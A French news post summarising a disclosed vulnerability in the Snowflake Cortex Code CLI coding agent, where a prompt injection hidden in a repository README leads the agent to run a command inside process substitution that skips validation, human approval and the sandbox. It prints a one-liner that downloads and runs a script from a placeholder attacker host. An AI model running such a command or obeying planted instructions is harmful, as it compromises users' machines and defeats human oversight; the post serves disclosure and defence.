Vulnérabilité de l'interface en ligne de commande (CLI) de Snowflake Cortex Code permettant une échappée du bac à sable et l'exécution de logiciels malveillants

✍️ OpenClawRadar📅 Publié: March 19, 2026🔗 Source
Vulnérabilité de l'interface en ligne de commande (CLI) de Snowflake Cortex Code permettant une échappée du bac à sable et l'exécution de logiciels malveillants
Ad

Détails de la vulnérabilité

Snowflake Cortex Code CLI est un agent de codage en ligne de commande qui fonctionne de manière similaire à Claude Code et Codex d'OpenAI, avec une intégration intégrée pour exécuter SQL dans Snowflake. Deux jours après sa sortie, une vulnérabilité a été identifiée dans le système de validation des commandes de Cortex Code qui permettait à des commandes malveillantes spécialement construites d'exécuter des commandes arbitraires sans déclencher les étapes d'approbation humaine et d'exécuter ces commandes en dehors du bac à sable de Cortex CLI.

Chaîne d'attaque

L'attaque fonctionne via une injection indirecte de prompt. Un utilisateur ouvre Cortex et active le bac à sable, puis demande à Cortex de l'aider avec une base de code open source tierce. Une injection de prompt cachée dans le README d'un dépôt non fiable manipule Cortex pour lui faire croire qu'il doit exécuter une commande dangereuse.

Cortex n'a pas validé les commandes à l'intérieur des expressions de substitution de processus, permettant l'exécution non approuvée de la commande malveillante :

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

Cette commande télécharge un script depuis le serveur d'un attaquant et l'exécute. Le contournement a fonctionné car :

  • Les commandes dangereuses à l'intérieur d'une expression de substitution de processus <() n'étaient pas évaluées par le système de validation
  • La commande complète commençait par une commande 'sûre' (cat dans ce cas)
  • Les commandes dans les expressions de substitution de processus ne déclenchaient jamais l'approbation humaine
Ad

Contournement du bac à sable

L'injection de prompt manipule également le modèle pour définir un drapeau qui déclenche l'exécution de commandes hors bac à sable. Cortex, par défaut, peut définir un drapeau pour déclencher l'exécution de commandes hors bac à sable, et l'injection utilise cela pour permettre à la commande malveillante de s'exécuter en dehors du bac à sable.

Remédiation

L'équipe de sécurité de Snowflake a validé et corrigé cette vulnérabilité, publiant un correctif avec Cortex Code CLI version 1.0.25 le 28 février 2026. L'avis complet de Snowflake est disponible sur le site communautaire Snowflake à : https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response

Note : Cette chaîne d'attaque s'appliquait également aux utilisateurs non bac à sable. La documentation indique qu'en mode OS+Régulier, toutes les commandes demandent l'approbation de l'utilisateur. Les commandes exécutées dans le bac à sable ont également des restrictions d'accès réseau et de fichiers.

📖 Lire la source complète : HN AI Agents

Ad

👀 See Also

Les applications construites par IA sont fragiles : pourquoi les petits changements brisent l'isolement des données et les autorisations
Security

Les applications construites par IA sont fragiles : pourquoi les petits changements brisent l'isolement des données et les autorisations

Des développeurs signalent que les applications générées par IA (via Claude Code, Cursor) cassent silencieusement la connexion, les autorisations et l'isolation des données lors de petites modifications, car les modèles d'IA ne comprennent pas l'intention originale du système comme les règles de propriété.

OpenClawRadar
Google signale que le piratage assisté par IA a atteint une échelle industrielle en trois mois
Security

Google signale que le piratage assisté par IA a atteint une échelle industrielle en trois mois

Le groupe de renseignement sur les menaces de Google a découvert que des groupes criminels et étatiques utilisent des modèles d'IA commerciaux (Gemini, Claude, OpenAI) pour affiner et étendre leurs attaques. Un groupe a failli exploiter une faille zero-day pour une exploitation massive, et d'autres expérimentent avec l'agent OpenClaw non protégé.

OpenClawRadar
L'expérience d'audit de sécurité montre que les performances des agents IA dépendent de l'accès aux connaissances.
Security

L'expérience d'audit de sécurité montre que les performances des agents IA dépendent de l'accès aux connaissances.

Un développeur a réalisé trois audits de sécurité sur la même base de code Next.js en utilisant différentes approches d'IA : la revue intégrée de Claude Code a trouvé 1 critique, 6 élevés, 13 moyens ; un agent IA sans contexte supplémentaire a trouvé 1 critique, 5 élevés, 14 moyens ; un agent IA avec 10 livres professionnels de sécurité a trouvé 8 critiques, 9 élevés, 10 moyens.

OpenClawRadar
Agent IA Exploite une Injection SQL pour Compromettre le Chatbot Lilli de McKinsey
Security

Agent IA Exploite une Injection SQL pour Compromettre le Chatbot Lilli de McKinsey

Des chercheurs en sécurité de CodeWall ont utilisé un agent IA autonome pour pirater le chatbot interne Lilli de McKinsey, obtenant un accès complet en lecture-écriture à sa base de données de production en deux heures via une vulnérabilité d'injection SQL dans des points de terminaison API non authentifiés.

OpenClawRadar